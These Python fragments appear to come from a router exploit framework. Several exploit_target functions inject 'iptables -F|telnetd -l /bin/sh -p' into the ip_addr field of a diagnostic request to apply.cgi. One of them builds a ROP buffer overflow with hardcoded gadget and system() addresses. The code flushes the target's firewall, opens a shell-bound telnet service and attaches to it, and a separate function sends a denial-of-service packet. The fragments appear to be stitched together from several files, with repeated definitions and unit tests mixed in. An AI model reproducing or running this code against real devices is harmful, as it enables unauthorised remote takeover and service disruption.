def exploit_target(host, port, telnet_port):
"""
Repeatedly attempt to exploit the target until a reverse shell is established.
:param host: IP address of the target.
:type host: str
:param port: Listening port of the target.
:type port: int
:param telnet_port: Port to open to establish the telnet connection.
:type telnet_port: int
"""
telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
packet = generate_exploit(host, port, telnet_command)
print(
'Repeatedly throwing exploit...this may take some time. Shell will appear when it succeeds.'
)
tn = telnet_connect(host, telnet_port)
while tn is None:
try:
mow.send_packet(host, port, packet, True)
except:
continue
tn = telnet_connect(host, telnet_port)
tn.interact()
def dos_target(host, port):
"""
Send packet to target causing a denial of service.
:param host: IP address of the target.
:type host: str
:param port: Listening port of the target.
:type port: int
"""
packet = create_dos_packet(host, port)
mow.send_packet(host, port, packet, True)
def test_send_packet_fire_and_forget(self, mock_socket):
host = '1.2.3.4'
port = 80
packet = b'packet'
mocket = mock.Mock()
mock_socket.return_value = mocket
mow.send_packet(host, port, packet, True)
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mocket.connect.assert_called_once_with((host, port))
mocket.send.assert_called_once_with(packet)
def exploit_target(host, port, telnet_port, username, password):
"""
Send the exploit to the target and connect to the reverse shell.
:param host: Target IP address.
:type host: str
:param port: Target port.
:type port: int
:param telnet_port: Telnet port to open on the target.
:type telnet_port: int
:param username: Username used for authentication.
:type username: str
:param password: Password used for authentication.
:type password: str
"""
# Drop firewall rules to allow connecting to the telnet server. '|' is used because ';' and '&' are dropped when
# present in the header.
telnet_command = b'`iptables -F|telnetd -l /bin/sh -p %d`' % telnet_port
authenticate(host, port, username, password)
data = {
b'ccp_act': b'set',
b'action': b'tools_diagnostic',
b'method': b'0',
b'ip_addr': telnet_command,
b'pkt_size': b'64',
b'cnt': b'4'
}
data = b'&'.join(b'%s=%s' % (key, value) for key, value in data.items())
request = mow.CustomRequest(host, port, mow.POST, b'apply.cgi', data=data)
packet = request.create_packet()
mow.send_packet(host, port, packet, True)
time.sleep(5)
tn = telnet_connect(host, telnet_port)
# If the exploit succeeded go interactive with the telnet session, otherwise report failure.
if tn:
tn.interact()
else:
print('Exploit failed, no telnet server listening at %s:%d' %
(host, telnet_port))
def test_send_packet_bad_block(self, mock_socket):
host = '1.2.3.4'
port = 80
packet = b'packet'
mocket = mock.Mock()
mock_socket.return_value = mocket
mocket.recv.return_value = None
mow.send_packet(host, port, packet)
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mocket.connect.assert_called_once_with((host, port))
mocket.send.assert_called_once_with(packet)
mocket.recv.assert_called_once_with(4096)
def exploit_target(host, port, telnet_port):
"""
Repeatedly attempt to exploit the target until a reverse shell is established.
:param host: IP address of the target.
:type host: str
:param port: Listening port of the target.
:type port: int
:param telnet_port: Port to open to establish the telnet connection.
:type telnet_port: int
"""
telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
packet = generate_exploit(host, port, telnet_command)
mow.send_packet(host, port, packet, True)
time.sleep(3)
tn = telnet_connect(host, telnet_port)
tn.interact()
def exploit_target(host, port, telnet_port):
"""
Send the exploit to the target and connect to the reverse shell.
:param host: Target IP address.
:type host: str
:param port: Target port.
:type port: int
:param telnet_port: Telnet port to open on the target.
:type telnet_port: int
"""
telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
packet = generate_exploit(host, port, telnet_command)
try:
mow.send_packet(host, port, packet, True)
except:
pass
time.sleep(3)
tn = telnet_connect(host, telnet_port)
tn.interact()
def test_send_packet_one_block(self, mock_socket):
host = '1.2.3.4'
port = 80
packet = b'packet'
mocket = mock.Mock()
mock_socket.return_value = mocket
return_data = b'a' * 100
mocket.recv.return_value = return_data
result = mow.send_packet(host, port, packet)
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mocket.connect.assert_called_once_with((host, port))
mocket.send.assert_called_once_with(packet)
mocket.recv.assert_called_once_with(4096)
self.assertEqual(result, return_data)
def test_send_packet_multi_block(self, mock_socket):
host = '1.2.3.4'
port = 80
packet = b'packet'
mocket = mock.Mock()
mock_socket.return_value = mocket
return_data = [b'a' * 4096, b'b' * 4096, b'c' * 100]
mocket.recv.side_effect = return_data
result = mow.send_packet(host, port, packet)
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mocket.connect.assert_called_once_with((host, port))
mocket.send.assert_called_once_with(packet)
mocket.recv.assert_called_with(4096)
self.assertEqual(mocket.recv.call_count, 3)
self.assertEqual(result, b''.join(return_data))
def exploit_target(host, port, telnet_port, username, password):
"""
Send the exploit to the target and connect to the reverse shell.
:param host: Target IP address.
:type host: str
:param port: Target port.
:type port: int
:param telnet_port: Telnet port to open on the target.
:type telnet_port: int
:param username: Username used for authentication.
:type username: str
:param password: Password used for authentication.
:type password: str
"""
# Drop firewall rules to allow connecting to the telnet server. '|' is used because ';' and '&' are dropped when
# present in the header.
telnet_command = '`iptables -F|telnetd -l /bin/sh -p %d`' % telnet_port
authenticate(host, port, username, password)
rop1 = 0x3e164
rop2 = 0x53168
rop3 = 0x3ca64
system = 0x57b1c
overflow = mow.Overflow(0x228, 3, mow.LITTLE_ENDIAN, 0, 0x76fd5000,
'ping result: ')
overflow.ra = rop1
overflow.add_to_stack(0x3c, address=rop2)
overflow.add_to_stack(0x34, address=rop3)
overflow.add_to_stack(0x2c, address=system)
overflow.add_to_stack(0x68, command=telnet_command.replace(' ', '${IFS}'))
overflow_string = overflow.generate()
data = {
b'ccp_act': b'set',
b'action': b'tools_diagnostic',
b'method': b'0',
b'ip_addr': overflow_string,
b'pkt_size': b'64',
b'cnt': b'4'
}
data = b'&'.join(b'%s=%s' % (key, value) for key, value in data.items())
request = mow.CustomRequest(host, port, mow.POST, b'apply.cgi', data=data)
packet = request.create_packet()
tn = telnet_connect(host, telnet_port)
while tn is None:
try:
mow.send_packet(host, port, packet, True)
except:
continue
tn = telnet_connect(host, telnet_port)
tn.interact()
